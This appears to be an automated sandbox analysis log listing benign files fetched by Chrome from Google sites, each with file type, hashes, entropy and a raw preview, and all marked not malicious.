URL:"https://www.google.com/xjs/_/js/k=xjs.s.en_US.u9kBZBte-Es.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAACBAIEAAAAAABQAAAAAAAAAAAAAAAAAAAAAIBAAgJAQAAACAABwAAAAICAAABAAAAERAAAEiAAAAAgAAAAAAAAAAIgAYAIAAAAAAC4AABAoAgAAEAAAgAEAAIAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAACCEA_AAAAAAAAAAAAAAgAAAAAAAYAAAAAAAAAAIAAAAAQIADAABmAAAAAAAAAAO4DgOABgCGFBQAAAAAAAAAAAAAAAIAEwViQgIIAAAAAAAAAAAAAAAAAAAAAKUETBwg/d=1/ed=1/dg=3/br=1/rs=ACT90oGlQ_qSjncWQjAN6Nnblp3ZMWaSlA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DM55c:imLrKe;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;FqHJkd:yQamIb;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;PqHfGe:im2cZe;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;Zen4yb:jMF88c;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bFZ6gf:RsDQqe;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lkq0A:JyBE3e;mzW4Id:nYdusb;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:mg5CW;qGV2uc:HHi04c;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uknmt:GkPrzb;uuQkY:u2V3ud;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;whEZac:F4AmNb;xBbsrc:NEW1Qc;xbe2wc:uRMPBc;xtZeyf:ax1MVb;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl"
                                                                                                                                                                                                                                                                                          Preview:this._s=this._s||{};(function(_){var window=this;.try{./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var baa,caa,naa,oaa,paa,qaa,raa,saa,taa,uaa,vaa,zaa,xaa,waa,Aaa,yaa,Baa,Daa,Caa,Eaa,Faa,Gaa,Iaa,Jaa,Waa,iba,nba,wba,yba,Bba,Fba,Gba,Lba,Qba,Tba,Vba,Zba,$ba,aca,bca,cca,eca,dca,gca,Uba,hca,ica,mca,nca,oca,sca,wca,xca,zca,Bca,Cca,Eca,Fca,Lca,Oca,Qca,ada,bda,cda,Xca,dda,Yca,eda,Wca,fda,Vca,gda,ida,pda,rda,sda,yda,zda,Dda,Gda,Ada,Fda,Eda,Cda,Bda,Hda,Ida,Mda,Oda,Nda,Rda,Sda,Tda,Vda,Xda,Wda,Zda,$da,aea,cea,dea,eea,fea,gea,jea,kea,lea,pea,oea,sea,tea,yea,zea,Aea,Cea,Bea,Eea,Dea,Hea,Gea,Jea,Lea,Mea,Oea,Pea,.Sea,Tea,Xea,Yea,cfa,efa,ofa,qfa,pfa,rfa,sfa,Wea,$ea,tfa,vfa,zfa,Dfa,Ffa,Jfa,Kfa,Sfa,Pfa,Tfa,Ufa,Wfa
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18536
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.986571198050597
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
                                                                                                                                                                                                                                                                                          MD5:8EFF0B8045FD1959E117F85654AE7770
                                                                                                                                                                                                                                                                                          SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                                                                                                                                                                                                                                                          SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                                                                                                                                                                                                                                                          SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3745)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4038
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.304825408517399
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:DkFs68yV4k/1BedpFVHgbDyHFf6Z1WKhdY7FHVMfrTQzqIGNqIjp:QZv2pEbiSZ1WV/MfKLGzt
                                                                                                                                                                                                                                                                                          MD5:9E011B074A17F4B03ADE7D11459C0D8A
                                                                                                                                                                                                                                                                                          SHA1:21B11E46187E60D7FB26B847A0761E9173C2C5F8
                                                                                                                                                                                                                                                                                          SHA-256:E82F1A686CE2F7A62A7078BF101A386C58BD4E3B0B2E99F5774B7C1E54F8440F
                                                                                                                                                                                                                                                                                          SHA-512:D4F2AA5C1CF68EED897007AB1CA2F495D8343D3FF5BEBDCB821600B5CE7DFBDC72F1ED7D404B5A354CADD60A6BA2EC969E938FA8D2632F8817311304A476322D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*!. * ScrollToPlugin 3.12.5. * https://gsap.com. * . * @license Copyright 2024, GreenSock. All rights reserved.. * Subject to the terms at https://gsap.com/standard-license or for Club GSAP members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e=e||self).window=e.window||{})}(this,function(e){"use strict";function l(){return"undefined"!=typeof window}function m(){return f||l()&&(f=window.gsap)&&f.registerPlugin&&f}function n(e){return"string"==typeof e}function o(e){return"function"==typeof e}function p(e,t){var o="x"===t?"Width":"Height",n="scroll"+o,r="client"+o;return e===T||e===i||e===c?Math.max(i[n],c[n])-(T["inner"+o]||i[r]||c[r]):e[n]-e["offset"+o]}function q(e,t){var o="scroll"+("x"===t?"Left":"Top");return e===T&&(null!=e.pageXOffset?o="page"+t.toUpperCase()+"Offset":e=null!=i[o]?i:c),functi
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1253)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6930
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.388337319532981
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+MuM+zaumRJ0+HnIKiuZ2+vehu71U3eoNka:ozNAJ0+HnIKiuZ2+GXka
                                                                                                                                                                                                                                                                                          MD5:313B92BF95C71336D783A9CFD594724C
                                                                                                                                                                                                                                                                                          SHA1:256602C15106EDE9AB7E2BD4DC5DC8D4A2412336
                                                                                                                                                                                                                                                                                          SHA-256:07CADDFFDDE958CF85A05115117F3C439E35095DB4597D47B1C73A18B17E2526
                                                                                                                                                                                                                                                                                          SHA-512:7369662803FBD77CA183BACF25A23F619DA68DEBD091B2D19D1662C195E7EB94992D524157A15E79971EEB46A64006437D3DF875CCBFDC0AFAF035E820F8857D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(s,c){'use strict';function P(c){var h=[];C(h,E).chars(c);return h.join("")}var D=c.$$minErr("$sanitize"),F,h,G,H,I,q,E,J,K,C;c.module("ngSanitize",[]).provider("$sanitize",function(){function f(a,e){return B(a.split(","),e)}function B(a,e){var d={},b;for(b=0;b<a.length;b++)d[e?q(a[b]):a[b]]=!0;return d}function t(a,e){e&&e.length&&h(a,B(e))}function Q(a){for(var e={},d=0,b=a.length;d<b;d++){var k=a[d];e[k.name]=k.value}return e}function L(a){return a.replace(/&/g,"&amp;").replace(z,function(a){var d=.a.charCodeAt(0);a=a.charCodeAt(1);return"&#"+(1024*(d-55296)+(a-56320)+65536)+";"}).replace(u,function(a){return"&#"+a.charCodeAt(0)+";"}).replace(/</g,"&lt;").replace(/>/g,"&gt;")}function A(a){for(;a;){if(a.nodeType===s.Node.ELEMENT_NODE)for(var e=a.attributes,d=0,b=e.length;d<b;d++){var k=e[d],g=k.name.toLowerCase();if("xmlns:ns1"===g||0===g.lastIndexOf("ns1:",0))a.removeAttributeNode(k),d-
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5490
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.946603898711352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:eHEltot9LO5WWu0P1KADIEOVpv5BG6Eqo0ke7AaV0wAj6EfSCVS1lpnw:eHch5K0LDIZBB8077f0fJfxVMw
                                                                                                                                                                                                                                                                                          MD5:3AAA9292C24AE36B8938E3C965C8A7B4
                                                                                                                                                                                                                                                                                          SHA1:FBFD2F1E6930CD719D48699F89A799D8E4576AB3
                                                                                                                                                                                                                                                                                          SHA-256:E2148E027D08AE75BAD35C17538BAE77D4755EEE0A3B6C137B9390200956E926
                                                                                                                                                                                                                                                                                          SHA-512:C70265954E4123C403BF5B0E7ECEA77A0AB32EC04BC2D4E491E4CE0FB5E5889A6F6358C6A4F6BEDD13CCD3A8223C1B6DD54D564E6826D0D6B9466BAD1452A787
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFj...WEBPVP8L].../..?.o.4.....B....;.4..h8..=z.k.$....F.....G.......Y1J.xa..I..2."..y..7n$...@..".%...D...H.y..........).....|.....)".]....QD..Dh......2.......dV.5.....C.X.....S....M.e..F>.h.R.C.9.t....&.....X*.@$.j .N.A.a<......;.%[n....3.B...3.%..m...a.......9.....Wl.........>.....s.....69.....Zu>... ..s0..%..0..p.,.X.U..Sq!..xV...p.N.}..Z..._6...z3....|W27...h?...).z.1......W.RYqVqPr03z..s..N.=~......z|.O.......Wo....9@|>..O.....,.h..m......g...?z.c^.....0Z...9Y9..W...7n.......RY]..H......?,....o.{...)..2s..Oo.[..7?....7?......Hg.1.......?.....].F.[.h...H7......bQ/..+.....z..#..!......c..tL....3j...y((...y>C....|..3..#=.U2<....|..R....../..|...;C..@..vf'...e....3.w..<...lV.7x.3^l.v...$..'r....v..N{R.y..*....."..J...".L5}q*...8..z...U..q...../..C......BEk.i. .D.9V.Np.1..:......qf.A.l#v".,T....[...F.w..D.6.4...N..mf_.zO*N.bI..9.cN.....a...Z...[........V.0.b.+j.w.r.L...`%.....Z..k.<.l6(.Vq2p.8r...xZ.............c.8............P.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1488x828, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):76892
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.997834794173462
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:PzG7GyjDOIdX95QnAUoohRmTn9hvHjvB7rYrbNr0ptkrCFtMo12:PzE/XuoormDPjNroJr0pSb5
                                                                                                                                                                                                                                                                                          MD5:2891394008B4932FE3F66CA17819F0F2
                                                                                                                                                                                                                                                                                          SHA1:68363CB08E300A36FD145E658838E44555419048
                                                                                                                                                                                                                                                                                          SHA-256:EFE90647C22DADD1ECB1404A867F15D8BADE85229A5F9AA6E73B2D6143699ACE
                                                                                                                                                                                                                                                                                          SHA-512:07354F6199C03CC2154299E3A9EC4587C2284E8E7967A26AA517A99AD6294B57435D30CB06A3A0B1EACA315A169201656E57E83262DE8452EAF315C3AB14B78B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFT,..WEBPVP8 H,...]...*..<.>=..C.!..(......gl.Ar|..>.N..6....(..7......?......>......+............t....G..|....W....]dr.........N[.......O.........|...._.U..[.?...................s...=......oS....._._...X....v.z[|../$O.......8.T.g...oM...|PN.F..X#..`%4..9Q.:.?N.'.g..n...0q9].*J>..E...p9.H..d....s......!.x6}r..}..C.&..7.,W....rR.K=..)$T.."....v.#.oX.RD......X....k.........V.._U]..x.8}...v.'..R.....S.wC..n.. ....].....07.{r..Os...&.V...a..#m..Rlfil.....N.[.Z..;Y...r.x..L'.W.7:.....$........\...._..T.............pc.=.^....N.F]q..'E9./##{..C...}=......\z.+....#..*c..\ .n..F..o+9.T.....F.vCh....>.>i.]N.<....~q..dw..I.F.... .M..e^...!WHP...F...a..F9A.............5n^.......g.C.i.../....y.%K...%.....7..hg..5G..&~..#....7~......V.....J|.-%.V.7`K....?^..J_...>e.t.9vP.5....UY0...5.....].*.S...B.Q...-.....>o.k.6^...rg1.v.WKq.....+."./..j.AY.=a...@..9........s4.U......b...$.(.....".L.V...s...&...^'...y....0.....IM....X.CG...<.".'.`.'.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (6274)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8161
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.448293049957296
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stzX4Kha+bZVBlwMEFUmD8V6IeMdndp3hW2hTBx2E3OEWW4K:6zIKh1bfrwMK9DM6lsnddhW2NBqXWD
                                                                                                                                                                                                                                                                                          MD5:DC2ECC8CBD247E55A77683E967B525C6
                                                                                                                                                                                                                                                                                          SHA1:7A5B16192FE938F8FF27AFA965AD9901D35EF124
                                                                                                                                                                                                                                                                                          SHA-256:4F433112F18C52E1323C7AE85F84DB3299EBDE91E5580AF05E7D64D08B8B57BF
                                                                                                                                                                                                                                                                                          SHA-512:E07DC9DB0500575DF07DBDB3B0E0914F9FEFDC8C68660F36E2FD5DB0A0EC00C75EFDCD2CD9F6BE6F3604530108BC13275D05A3EB8F211FF9A4FA8956478DCA01
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/RpI-OtYr.min.js
                                                                                                                                                                                                                                                                                          Preview:/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const w=globalThis,N=w.trustedTypes,S=N?N.createPolicy("lit-html",{createHTML:n=>n}):void 0,B="$lit$",u=`lit$${(Math.random()+"").slice(9)}$`,L="?"+u,Z=`<${L}>`,m=document,b=()=>m.createComment(""),H=n=>n===null||typeof n!="object"&&typeof n!="function",P=Array.isArray,j=n=>P(n)||typeof n?.[Symbol.iterator]=="function",M=`[ ..\f\r]`,y=/<(?:(!--|\/[^a-zA-Z])|(\/?[a-zA-Z][^>\s]*)|(\/?$))/g,I=/-->/g,R=/>/g,p=RegExp(`>|${M}(?:([^\\s"'>=/]+)(${M}*=${M}*(?:[^ ..\f\r"'\`<>=]|("|')|))|$)`,"g"),U=/'/g,O=/"/g,W=/^(?:script|style|textarea|title)$/i,f=Symbol.for("lit-noChange"),c=Symbol.for("lit-nothing"),k=new WeakMap,g=m.createTreeWalker(m,129);function D(n,t){if(!Array.isArray(n)||!n.hasOwnProperty("raw"))throw Error("invalid template strings array");return S!==void 0?S.createHTML(t):t}const z=(n,t)=>{const s=n.length-1,e=[];let i,r=t===2?"<svg>":"",o=y;for(let a=0;a<s;a++){const h=n[a];let $,A,l=-1,_=0;for
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):7323
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.958638329717196
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:JVK2xmb2EVQeqJTDASVn2uXYrB19n+1zuynMUQ1fG:JEOm/VQeqJP952sYrB19YzuyMUQ1fG
                                                                                                                                                                                                                                                                                          MD5:C8DBE0DD84A45F5E2A6BC9C9928C8492
                                                                                                                                                                                                                                                                                          SHA1:E388FF567548224DAF566CF37A6C7AB8FF08069C
                                                                                                                                                                                                                                                                                          SHA-256:07379D53AFD4C8E0BAA7AA200059E30F9DE4F659552C1F8C50570F8F16B583C2
                                                                                                                                                                                                                                                                                          SHA-512:6C1AE903673C9D9EC3A703238355AD8FB195071A067F0939ECF4DD4CD1530540AA7A84F36598661643A5251F5FE8B488CDAEB1581BBCFB20B3A790F87A09C5C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/l7AGEV3K2ayj5g1Vb4nsrQs5WyHTr7Bl65GhPxO68pDZDsVurAbsSOTwmXnjK8qMt2gahvRxN9y3nnd1G118dLTtN5k8-j7MLD0qMl4=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....RIDATx..{...}.?.....=...R$..... .."E34I..T%:Q.T.UL\!..*r$U........*.a*,...K..(.K........|..(....x.......93..co...3..w{{...............Wq.Wq.Wq.W....].[..s.M.m\..v.Rh..(4*..Z...5hEW.t...+./mOi..<Uw....s.g.}...........d.....g.;..V..N.L.^..n.F..ZG..Sf.G.......v...J.. .:r....sR.?`......4..m_o ..M9U.4N......E.......P.qDF.%"....,)(...i..O.}t.?.{.Wb^Y1....>%o....X....J.].....dF!m...[....\........m.f.}.JL.+.......o...o-..UQ....K.&].X..>.J...q!0...q.w..iL.+.9..>...1...W*...iW.H..."..H..5.m~m.@j._.C.....A..~.*.P.....g?..0..*.M!oUZ'..V.^..@:...Y.P.V.Y..Rt..0>..."...,......\.......2....\..$-|;.}g...}....x.`..,P...(.. .J..R.>zf..x..........\..Z....?>>.Zc.........{2.[...5.cY..r&Zk.%..-.5.5=r15...{......K!7.....5......k...iM..X..0R.'.w....0..Y.)."..T4...g...J$`.........KJ.o'rLfLD.K...M.<.e..Y<.35..B......... ...g...dq.a.6..........._.....~.yF.g....,lq.]).T...o.i #....<...[.......&...|.5...aC.$.8.B....?..b
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x300, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):73286
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.980802676626249
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:9CSQH54dUhYpzKVQuMG/gt+DYKs3+SZTokIBp3Xp/0YJfkgDNa:AFHaGhq0nMYDYdO+hqHdfkgDNa
                                                                                                                                                                                                                                                                                          MD5:91D24474FE6FAB3962B59F2080AE2842
                                                                                                                                                                                                                                                                                          SHA1:4C5E21E48791ADFC9BA44DB34083B2B0C14A3B1B
                                                                                                                                                                                                                                                                                          SHA-256:23975F8DB3371A25A667ADA972D884365631FE351C37A4A721E4A5D9A45E0F9C
                                                                                                                                                                                                                                                                                          SHA-512:3634DA7EB82C93AFD01BE869F67CC39E5616432B3D1F3AE453B0B4E3492FF0F9AF189365FDF70224809CCAA6689D1C197F79E72126AB19BB711694F600D93D56
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................,...."..........................................V.........................!.1A.."Qa.2q..#BR....3b...$r.......%4CScs......Dt.5ETd.....................................?........................!1..AQa"q.....2......#BR....3r.b$C...............?..V...9rX....&u.(.Y..H.Vwv<.QAf'..pI.~.u.8..SQ&...UW =.4d..v.!..N. .......=..~.....j...](.U;.jX..A..4F...n. nR.2.....@;7....j$.k.W.X...jJ.,...........(......s...s4.C.m...Q..r.N+.X..0]=..`.k.*7..~....8[4J*s%L.Y7.-..M...;s...7A.R{.>J..~.\.m...O.II....@...D...n..4...o.U....@.@...??<\.(..^..IU{wmb....I;.6?.<..D..]..F..m.Q7,..9..Xg.Z.Z>.D.n.._k....Kv..cN..t.._Jys...\..*..{.7.....YEh.D....Z..I6.u..y.[...9......YkrH..x.........i.=..&;Z;...k.]y..\.....sacg3..G.Th.$..WGSfVSb.;..l...K.....,,8...OY<T..4....(..gv..@:.H..$...M.....2t..0U..H......w=.0.0.w./.....xl.:(.k.e.y.z*....y....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):6744
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9494181708599685
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:otaZ2gKVZh1LU9eAKi+gZKKampGIw2rVw59elyxwjF88Z1OST8cDj4OQrhB:m6eZh1pAKAZZGR2rVGqyxwjF88Z1ljC
                                                                                                                                                                                                                                                                                          MD5:63F8F0D150A3C8F4FBE2D867451F3F54
                                                                                                                                                                                                                                                                                          SHA1:3E63D160790BCD99D84482F7C61A882BCB7749C1
                                                                                                                                                                                                                                                                                          SHA-256:697882381A6183F72975241C72080022C44FA396FB1315B3DF9BE6B49361C527
                                                                                                                                                                                                                                                                                          SHA-512:477E130ED8562A350FFD089582E3594320B9DFF68AE5AA0321F1AF6A11D9C2FFBBF3241A52A115F8D7B3471047AC4C588F699E71844A444E77C3EB6BC4319D60
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/uzkOxzfGFGjzRx0FK6B541qcv469wNDTQf_TUu4oqH_oPUGJoajTkqHLJ9DD188Kmocg_DJg2OBf1FxyRc6MLK_gMFFRmm7n7XTreZU=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..][.]Wy....9s...........FX.....Q(U..@J_P..#.V.C..P.*....R.../}jEPEI!..*.T..v...x|..3..v.\.^......Z{.s......m........./.....j....j....j....j....j....j..&...f.....?G..!D.E!..4.6.y..2...`M..C...~..|....%...}t=|+.....SW.?..?:.gO..K4.....@ ..lE..\_....6/.T.G.\.@..[....._..'..#.t......'..Wz...}q......g......:.VLp.`z..h...G..@....6<+........4}....0M.}.S......=....^}.Ioe.-...m...O.^..F...G~.?..H.eB0..jL....`[.q....@...Z.6./..?.GS{&7.=g.~...G~.V....B....?9...c.....@..E..#l..A..*.N.. ..6.G.@.k7.}..|.U......\........?.6N....~......C`.@".X.B.....v%.w..2*`. ...-.{.....3.....#.W....h......s.5tn<.(. .xQ..........~".....M.?...............+...^.....O?3.._..*@>....h.."...9..d.U&B...<....;m~.?..i.....J..p...+..).w....{.....Oh..B..3.8.X.. .lE. ".....(4....b8........X..........].%.."..."z;.01.....o.O% g.Z..m".
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1112
